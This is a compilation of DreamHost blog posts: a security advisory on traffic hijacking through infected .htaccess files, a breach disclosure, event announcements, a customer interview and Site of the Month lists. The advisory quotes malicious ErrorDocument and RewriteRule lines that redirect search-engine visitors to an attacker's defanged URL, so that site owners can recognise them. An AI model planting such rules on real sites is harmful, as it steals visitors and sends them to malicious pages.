There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” was somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small of a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are, and it is more likely that a site that is run by a small business or single site owner is going to not only be behind on their security updates for any software running on their site, but it’s also unlikely that they regularly monitor their site for malicious activity.

The “cash out” phase is usually when of our customers first find out that they’ve been compromised. By that time their site(s) are now taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover methods these attackers use as well as what you should be on the look out for.

Today we will be going into just one of these attacker’s malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is setup or infected your existing “.htaccess” file on your site. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originated with by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(to explain the above, the attackers are basically taking any search engine traffic, and redirecting it to their site)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/sFTP client so you can view “.htaccess”.) We are already actively scanning for these infections on our customers sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are are open to sharing information about web based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow up post I will cover the life of a web based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!

The “Ceph Lords” refer to an elite society of scholars, technologists, and engineers that was founded by Captain Nemo almost 150 years ago.  While on a seafaring exploration 20,000 leagues under the sea, he tangled with a colossal cephalopod that had never been documented before.  Thereafter, the Captain recruited the best and brightest to study nature’s mysteries and apply their discoveries in an effort to advance science and technology.

Over fifty highly esteemed members of the OpenStack community will convene at DreamHost’s San Francisco office on Thursday, February 2^nd.  The theme of this Meetup will be the Ceph storage project and how it’s currently being implemented in production.

Ceph is a massively scalable, open source, distributed storage system.  There has been widespread interest from the OpenStack community in using Ceph’s RADOS Block Device to fill the block storage void in the cloud software stack.  There is also interest in using Ceph’s object store as a potential alternative to Swift.

The OpenStack project has been an important part of Ceph’s development effort.  To learn more about how the Ceph team is contributing to the OpenStack project, visit http://ceph.newdream.net/openstack/ .

RSVP today to save your spot at this upcoming OpenStack Meetup.

Agenda

6:30 PM – Food, drink, & networking

7:15 – Welcome

7:25 – “Introduction to Ceph and DreamHost’s Object Service Deployment”

Ben Cherian, GM of Emerging Tech at DreamHost, will kick off the discussion.  He’ll provide a general overview of the Ceph project.

Tommi Virtanen, Senior File Systems Engineer, will continue the overview from a much more technical perspective.

Carl Perry, Cloud Architect, will finish with a real-world description of the DreamHost object storage service implementation of Ceph.

8:15 – Intermission

8:30 – “OpenStack Block Storage with Ceph”, Christopher MacGown, Co-Founder and CTO of Piston Cloud Computing, Inc.

9:15 – Sessions are complete – more networking

Customer Spotlight: Splatter Music

Congratulations on Splattermusic.com winning DreamHost Site of the Month in the content, design and overall categories! Tell me about Splatter Music?

Jim: Thanks! I launched splatterMUSIC.com in February 2011 as a video site that focused on more serious, user-generated content such as new music videos and album reviews. I quickly realized the comedic content of the site was getting the most attention and it’s what I really enjoyed the most too. In July, I shifted splatterMUSIC to focus completely on the comedic video and music content, and the rest is history. Our slogan is — “All Music. All Video. All Funny.” — because we are the only comedic music site and feature only hilarious, quality, video content.

And aside from being a website with a lot of crazy FAIL, music video parodies and barfing drummer videos, we’re increasingly known as a powerful place for bands to get unique exposure. When there is a stage mishap caught on video, for example, you have a cool way for you to reach new fans and that’s where we come in. Just this week actually, we launched a short clip from a local LA band called “Raw Geronimo” to be funny, while also giving them some cool publicity and new fans.

Who designed your site?

Jim: I did. I am not very technical, but I had built some previous websites with WordPress and can usually figure out how to do what is needed. A huge amount of time went, and still goes, into the site’s design. It’s meant to be simple, clean, LOUD and fun.

What is your web traffic like?

Jim: Well, our busiest day last month had over 282,000 video views. I’m working hard to make every day that awesome. An average day isn’t too far below that though. Most of all, we have a really active audience that hang out and watch a few videos at a time, which is awesome. I even created a fake user name that I use when I comment and talk to people on the site.

Which Splatter Music landing page has the most traffic?

Jim: Our viewers usually come to the site from a link to a particular video that was shared with them. So the most popular videos are the most popular pages. A lot of people then stick around and cruise the homepage for more videos, which makes me super happy.

What are your favorite videos?

Jim: All of them are really my favorites since I approve the final content of the site. I am the Hugh Hefner of splatterMUSIC. I think two of my favorites today are “Top 5 Worst Guitar Solos Ever” and “Orchestra Fail.” Those rip me every time.

What videos got the most action on your site?

Jim: The most popular video ever is “Notorious B.I.G. Calms Crying Baby.” When we posted that video ahead of the curve, the discovery engines and social networks got hold of it and it exploded.

 How long have you been using DreamHost?

Jim: When I decided to create the site, I went with DreamHost. I also use DreamHost for my late father’s website, which holds many of his books, lectures and writings. That site is RonMillersWorld.org. He was a highly-regarded expert, so anyone with an intellect in theology and spirituality should check it out.

How did you find DreamHost?

Jim: I used Google search and carefully researched the companies that were recommended for web hosting. I called each of them and the person I spoke to at DreamHost was really down to earth and helpful. I didn’t feel like he was trying to sell me. It’s been a perfect marriage ever since.

Any parts of the DreamHost Panel you use?

Jim: Yeah, I use the DreamHost Panel all the time: 1-click Installs, site status, support questions, renewals and registrations, WebFTP, etc. There might even be some new additions coming to the “splatter” family later this year.

What’s next for splatterMUSIC?

Jim: Right now we are testing original splatterMUSIC videos, and also teaming up with celebrity musicians to shift into becoming a production entity as well as a distribution channel. One example is a video by Mat Devine of Kill Hannah called “MAT DEVINE READS: “Damn It Feels Good To Be a Gangster.” We’re high school friends from back in Chicago and it is hilarious. So the short-term will increasingly see a lot more of these partnerships, as well as a lot of crazy original splatterMUSIC productions.

Where else can we find you online?

Jim: We are all over that information highway, but Facebook and Twitter are our primary social networking hubs.

Facebook: http://www.facebook.com/splatterMUSIC

Twitter: http://www.twitter.com/splatterMUSICco

In the DreamHost spirit of transparency and openness, I’m providing this update on our blog on the security issue yesterday. It’s necessarily pretty dry and factual, unlike most DreamHost posts, but that’s important to communicate as much detail as possible while not disclosing the inner workings of our security defenses. The bad news is that we detected access to one of our databases and took rapid action to protect customer accounts and passwords. The good news is that it does not appear that any significant malicious activity has occurred on any customer accounts as a result of the illegal access.

Early yesterday, one of DreamHost’s database servers was illegally accessed using an exploit that was not previously known or prevented by our layered security systems in place. Our intrusion detection systems alerted our Security team to the potential hack, and we rapidly identified the means of illegal access and blocked it.

Our first priority in this situation is to protect the safety and security of our customers’ websites and information. A quick review of the data potentially accessed indicated that some customers’ FTP and shell access passwords may have been compromised. So we decided to err on the side of caution and immediately initiate a forced reset of all customers’ FTP and shell access passwords, with the aim of preventing any illegal activity on customer websites. All FTP and shell access passwords were reset, and customer notifications were inserted in the web panel and on www.dreamhoststatus.com asking customers to specify new passwords once they’d logged in.

DreamHost has three types of user passwords – a web panel password, FTP/shell access passwords, and email passwords. Web panel passwords and email passwords were not accessed or affected. However we recommended in an update email to customers and their email users late yesterday that they reset their email passwords as well, as a precaution. It’s important to note that NO CUSTOMER BILLING INFORMATION OR OTHER PERSONAL INFORMATION WAS ACCESSED.

Our Security and Software teams have been investigating if any customer sites, apps or blogs have been affected as a result of the intrusion. As yet we have not identified any major issues – potentially as a result of the swift action to force a password reset. We’ll continue to monitor all systems and investigate and assist with any issues if they come up. We’ll all be working hard over the coming days to minimize any impact on customers beyond the password reset.

DreamHost uses a sophisticated suite of security software and constant monitoring that typically prevents any type of illegal access to our systems. In this case, our systems were not able to prevent the unauthorized access, however our intrusion detection system did allow us to respond immediately and minimize customer impact. We’ve already implemented changes to prevent any similar attempted hacks, and we’re performing a rigorous security review including a detailed review of customer input on potential vulnerabilities. Defending against cyber attacks is unfortunately an everyday part of business for Internet companies, so we’re constantly evolving our security measures to prevent them.

Thanks to all our customers for your patience, support and understanding. We acted swiftly to minimize the risks of the intrusion, and we know that changing passwords has caused you inconvenience. Customers who have ongoing concerns can contact our support team through the web panel. And I’ll be posting another update here if further information that can be shared publicly.

Simon Anderson
CEO, DreamHost

Shhhh! Do you hear that?

Listen!

Close your eyes and really concentrate.

That, my friend, is the sound of about two thousand oversized nerd guts clenching in feverish anticipation of the Southern California Linux Expo!

We can count ourselves among the clenched faithful as both DreamHost and the Ceph team are sponsors of the show this year!

SCALE 10x (it’s the 10th one!) kicks off TOMORROW at the LAX Hilton!

Ceph’s chief architect, Sage Weil, will be speaking at SCALE Sunday, January 22nd, at 4:30pm in the “Los Angeles B” room: “Ceph Distributed Storage System”

If you plan to attend SCALE this year make sure you stop by the Ceph booth (booth #6!) to meet some of our team!

Bring a resume too, because you never know what might happen… Both DreamHost and Ceph have plenty of jobs and not enough people!

Try to get some rest tonight.

Unclench yourself and prepare to be assaulted by an open source love-fest.

Things will get weird.

Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  November

The winner in the Overall, DESIGN, STRUCTURE and ORIGINALITY categories is: Portfolio of Daniel Hritzkiv

“Daniel Hritzkiv is a web-centric graphic designer always looking to create great new things.”

The winner in the CONTENT category is: My After Sex Buddy

The After Sex Buddy is the world’s first after sex cuddling doll.

Stay tuned for December 2011 DreamHost Sites of the month!   

Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  October

The winner in the DESIGN and STRUCTURE categories is: The Modern Nomad

“A blog tracking my transformation from office worker to world-wandering nomad. I focus on text quality and design. The content is a mix between personal experiences and information useful to anyone interested in a nomadic lifestyle. The theme was re-written from scratch.”

The winner in the CONTENT, ORIGINALITY, and OVERALL categories is:splatterMUSIC
“There are enough sources that feature, cover, regurgitate and promote the very best of music. And so I’m here to promote the very WORST! splatterMUSIC is the first and only comedic music site and features only video content. I hope you enjoy… or at least laugh.”

This month we’d also like to recognize an incredible piece of Facebook appery from one of our customers. It went viral in the weeks leading up to Halloween and doesn’t show any signs of stopping. I won’t ruin the surprise for you, but be sure to check it out at…

http://www.takethislollipop.com/

In the hosting industry customers do switch hosts from time to time.

It happens.

Customers leave DreamHost and old customers come back to DreamHost. Every day.

It happens to us, and it happens to other hosts.

It’s an endless cycle of creation, destruction, and rebirth.

It keeps things interesting and it keeps us on our toes.

There are many reasons for customer churn. Pricing, features, service levels, and positions on hot political issues are just some of the many criteria that a discriminating hosting customer might look for when selecting a home for their website.

“SOPA” has been in the news a lot lately. It’s a piece of legislation that threatens the very nature of the Internet. DreamHost opposes SOPA. Many web hosts do. But not all.

The Save Hosting Coalition explains why SOPA is bad for web hosts. And americancensorship.org explains what’s wrong with SOPA in a great infographic.

If your host has rubbed you the wrong way about SOPA or any other issue, allow us to lather you up with this special offer…

It’s a great way to get yourself up and out of a bad hosting situation, and in to the loving arms of DreamHost – lovers of open-source software, WordPress, free speech, freedom on the Internet, puppies, kittens, and candy.

Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  September

The winner in the DESIGN and ORIGINALITY categories is: Max Parr

“Max Parr is a Filmmaker and Photographer. These are his selected works.”

The winner in the STRUCTURE, CONTENT, and OVERALL categories is:  Boulomma
“Branding, Logos, Brochures, Websites, and Mobile applications”

Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  August

The winner in the DESIGN and STRUCTURE categories is:  One Long House

“We are a cooperative of designers, writers, photographers, programmers, and creatives alike. Our common bond is embracing curiosity and loving to create.”

The winner in the OVERALL, CONTENT, and ORIGINALITY categories is:  Tampa Changing Re-Photography
“Re-photographing historic buildings in Tampa, Florida.”